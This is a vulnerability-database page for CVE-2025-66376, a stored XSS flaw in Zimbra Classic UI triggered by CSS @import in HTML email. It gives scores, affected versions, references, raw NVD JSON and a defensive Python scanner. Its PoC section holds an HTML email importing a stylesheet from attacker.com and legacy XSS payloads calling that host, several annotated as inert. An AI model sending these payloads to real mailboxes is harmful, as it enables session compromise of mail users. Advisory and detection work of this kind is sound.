Security Vulnerability Report
CVE-2025-66376 CVSS 7.2 HIGH

CVE-2025-66376

Published: 2026-01-05 15:15:45
Last Modified: 2026-03-18 20:13:37

Description

Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message.

The injection vector is the message body itself: an attacker sends HTML mail whose style element carries an @import rule, the server stores the message, and the imported stylesheet is pulled in when the recipient opens the message in the Classic web UI, which did not neutralize @import before the fixed releases. No credentials on the target are needed beyond the ability to deliver mail to one of its users. The weakness is classified as CWE-79. CISA added this CVE to its Known Exploited Vulnerabilities catalog on 2026-03-18, with a required action date of 2026-04-01.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

The 7.2 HIGH figure above is the CNA-supplied (Secondary) metric. NVD's own (Primary) assessment is 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. The two differ only in User Interaction: NVD rates it Required, since the stored payload renders only when the victim opens the message in the Classic UI. Both agree on Scope: Changed (the impact lands in the victim's browser session rather than on the mail server) and on Low confidentiality and integrity impact with no availability impact.

Configurations (Affected Products)

cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.0.0 (inclusive) up to 10.0.18 (exclusive)
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - VULNERABLE, versions from 10.1.0 (inclusive) up to 10.1.13 (exclusive)
ZCS 10.0.x < 10.0.18 (fixed in 10.0.18)
ZCS 10.1.x < 10.1.13 (fixed in 10.1.13)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-66376 PoC: stored XSS via CSS @import in Zimbra Classic UI -->
<!-- Send this HTML e-mail to a mailbox on the target Zimbra server; the import
     is fetched when the recipient opens the message in the Classic UI -->
<html>
  <head>
    <style>
      @import url('https://attacker.com/malicious.css');
    </style>
  </head>
  <body>
    <h1>Test Email</h1>
    <p>This email contains malicious CSS import.</p>
  </body>
</html>

css
/* malicious.css, served from the attacker-controlled host named in the @import.
   The rules below are the generic payloads carried by the original PoC; whether
   any of them does anything depends on the victim's browser, not on Zimbra. */

body {
  /* Legacy Internet Explorer only: expression() was dropped in IE8 standards
     mode and is not parsed by any current browser. */
  width: expression(alert(document.cookie));
  /* javascript: URLs inside url() are refused by current browsers; historical only. */
  background: url('javascript:alert(document.domain)');
}

/* Legacy Firefox only: XBL bindings have been removed from Firefox. */
body {
  -moz-binding: url('https://attacker.com/xbl.xml#xss');
}

/* Generated content can only insert text, never markup or script. */
div::before {
  content: 'PAYLOAD_PLACEHOLDER';
}

/* CSS animations cannot execute JavaScript; this rule is inert on its own and
   is kept only because the original PoC included it. */
@keyframes xss {
  from { left: 0; }
  to   { left: 100%; }
}
input[type="text"]:focus {
  animation: xss 1s infinite;
}

/* The original PoC wrote url('https://attacker.com/steal?data=' + document.cookie).
   That is not valid CSS: the language has no string concatenation and cannot read
   document.cookie, so a browser simply drops the declaration. What an imported
   stylesheet can do unaided is make the victim's browser fetch attacker URLs,
   which at least confirms that the @import was rendered. */
* {
  background-image: url('https://attacker.com/loaded');
}

The description on this page says only that the Classic UI failed to neutralize @import in message HTML; it does not name the exact point at which script execution becomes possible. Treat the contents of malicious.css as illustrative: the security-relevant fact demonstrated by the PoC is that an attacker-controlled stylesheet is loaded into the victim's mail session at all.
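Added example, not code from the original page or from Zimbra: a Python check a mail administrator or gateway operator could run over a stored message to find @import directives in its HTML parts, which is the precondition for this CVE. It normalizes the CSS the way a browser tokenizer would before matching (comments removed first, then backslash escapes such as @\69mport decoded), so trivially obfuscated imports are not missed. The sample message is constructed for the example and attacker.example is a placeholder host; both are assumptions, not data from the page.

```python
"""Find CSS @import directives in the HTML parts of an e-mail message.

Added example for CVE-2025-66376 triage; not code from the original page or
from Zimbra. The sample message below is constructed, and attacker.example
is a placeholder host.
"""
import re
from email import message_from_string, policy
from html.parser import HTMLParser

# CSS comments are removed before anything else, as a CSS tokenizer would.
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Backslash escapes: \HHHHHH (1-6 hex digits, one optional trailing whitespace
# is consumed) or \<any single char>. Decoding them defeats @\69mport tricks.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)
# @import followed by an optional url( wrapper and optional quote, capturing
# the target up to a quote, closing paren, whitespace or semicolon.
IMPORT_RULE = re.compile(r"@import(?![\w-])\s*(?:url\(\s*)?[\"']?([^\"')\s;]+)", re.I)


def _decode_escape(m):
    if m.group(1) is not None:
        cp = int(m.group(1), 16)
        # NUL, surrogates and out-of-range code points become U+FFFD, per CSS Syntax.
        return chr(cp) if 0 < cp <= 0x10FFFF and not 0xD800 <= cp <= 0xDFFF else "\ufffd"
    return m.group(2)


def normalize_css(css):
    """Strip comments, then decode escapes (in that order, like a tokenizer)."""
    return CSS_ESCAPE.sub(_decode_escape, CSS_COMMENT.sub(" ", css))


class _StyleCollector(HTMLParser):
    """Collects the raw text of every <style> element."""

    def __init__(self):
        super().__init__()
        self._in_style = False
        self.styles = []

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
            self.styles.append("")

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.styles[-1] += data


def find_css_imports(html):
    """Return the targets of all @import rules in <style> blocks of an HTML string."""
    collector = _StyleCollector()
    collector.feed(html)
    collector.close()
    targets = []
    for css in collector.styles:
        targets.extend(m.group(1) for m in IMPORT_RULE.finditer(normalize_css(css)))
    return targets


def scan_message(raw_eml):
    """Return @import targets found in every text/html part of an RFC 822 message."""
    msg = message_from_string(raw_eml, policy=policy.default)
    targets = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            targets.extend(find_css_imports(part.get_content()))
    return targets


# Constructed sample: one import hidden behind a comment and a hex escape,
# one written plainly. Neither should survive a sanitizer that blocks @import.
SAMPLE_EML = r"""From: sender@example.test
To: victim@example.test
Subject: constructed test message
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

plain-text alternative

--b1
Content-Type: text/html; charset=utf-8

<html><head><style>
/* harmless looking */ @\69mport url( 'https://attacker.example/sheet.css' );
@import "https://attacker.example/second.css";
h1 { color: red; }
</style></head>
<body><h1>Test Email</h1></body></html>

--b1--
"""

if __name__ == "__main__":
    for target in scan_message(SAMPLE_EML):
        print("suspicious @import ->", target)
```

Run it against a message exported from the mailbox store (or a gateway sample) instead of SAMPLE_EML to list every external stylesheet an affected Classic UI would have fetched. Inline style attributes are deliberately not scanned: at-rules such as @import are not valid there, so only style elements matter for this CVE.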

References

https://wiki.zimbra.com/wiki/Security_Center (Vendor Advisory, Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes (Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes (Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy (Product)
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories (Vendor Advisory)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-66376 (US Government Resource)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66376",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T15:15:44.903",
    "lastModified": "2026-03-18T20:13:37.087",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "cisaExploitAdd": "2026-03-18",
    "cisaActionDue": "2026-04-01",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability",
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.18", "matchCriteriaId": "7D423DB3-FCD4-445F-A778-BC5F83E01953"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.13", "matchCriteriaId": "7C3F6B1E-1671-461B-A093-7B6854C227FE"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]},
      {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-66376", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}
    ]
  }
}